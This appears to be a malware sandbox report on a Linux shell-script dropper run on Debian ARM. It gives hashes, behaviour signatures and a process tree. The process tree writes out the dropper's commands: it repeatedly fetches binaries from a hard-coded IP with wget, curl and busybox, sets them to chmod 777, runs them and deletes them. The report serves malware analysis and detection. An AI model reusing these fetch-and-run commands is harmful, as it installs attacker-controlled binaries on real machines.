Analysis
-
max time kernel
26s -
max time network
67s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 03:02
Static task
static1
Behavioral task
behavioral1
Sample
edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh
-
Size
10KB
-
MD5
8c5495a4b70dcc94500f7181a9826b51
-
SHA1
e9b6f579f9aa552f232b5d99477d13fc078673b8
-
SHA256
edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc
-
SHA512
bcfc0e62ad7d07abc2d257f1d71feb10c7b88d676d0ab8c87eec62eca6741bb3c1a6f2ed6ff2848c04eda7d894761fbb30a7b7cbd4e9320bf0689496b94aa6ba
-
SSDEEP
96:ojMdujMFHqjMdpMojMkMci+D2uLd0Q/4YAZlx8tlYisYUZVO9NOCbNWFhvUZVO9k:dyHLY0MNWFh0EFh/u
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 678 chmod 698 chmod 728 chmod 692 chmod 714 chmod 740 chmod 755 chmod 773 chmod 781 chmod 787 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E 679 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT 693 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz 699 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 716 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe 729 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 742 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu 756 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g 774 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq 782 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 788 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 -
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 10 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz curl File opened for modification /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g curl File opened for modification /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq curl File opened for modification /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 curl File opened for modification /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E curl File opened for modification /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT curl File opened for modification /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 curl File opened for modification /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe curl File opened for modification /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 curl File opened for modification /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu curl
Processes
-
/tmp/edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh/tmp/edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh1⤵PID:652
-
/bin/rm/bin/rm bins.sh2⤵PID:654
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:660
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:667
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:676
-
-
/bin/chmodchmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- File and Directory Permissions Modification
PID:678
-
-
/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- Executes dropped EXE
PID:679
-
-
/bin/rmrm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:680
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:682
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:685
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:690
-
-
/bin/chmodchmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- File and Directory Permissions Modification
PID:692
-
-
/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- Executes dropped EXE
PID:693
-
-
/bin/rmrm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:694
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:695
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:696
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:697
-
-
/bin/chmodchmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- File and Directory Permissions Modification
PID:698
-
-
/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- Executes dropped EXE
PID:699
-
-
/bin/rmrm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:700
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:701
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:702
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:712
-
-
/bin/chmodchmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- File and Directory Permissions Modification
PID:714
-
-
/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- Executes dropped EXE
PID:716
-
-
/bin/rmrm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:717
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:719
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:722
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:725
-
-
/bin/chmodchmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- File and Directory Permissions Modification
PID:728
-
-
/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- Executes dropped EXE
PID:729
-
-
/bin/rmrm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:730
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵PID:731
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵PID:738
-
-
/bin/chmodchmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵PID:753
-
-
/bin/chmodchmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵PID:758
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵PID:770
-
-
/bin/chmodchmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵PID:775
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵PID:777
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵PID:780
-
-
/bin/chmodchmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- Executes dropped EXE
PID:782
-
-
/bin/rmrm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵PID:783
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵PID:784
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:785
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵PID:786
-
-
/bin/chmodchmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵PID:790
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97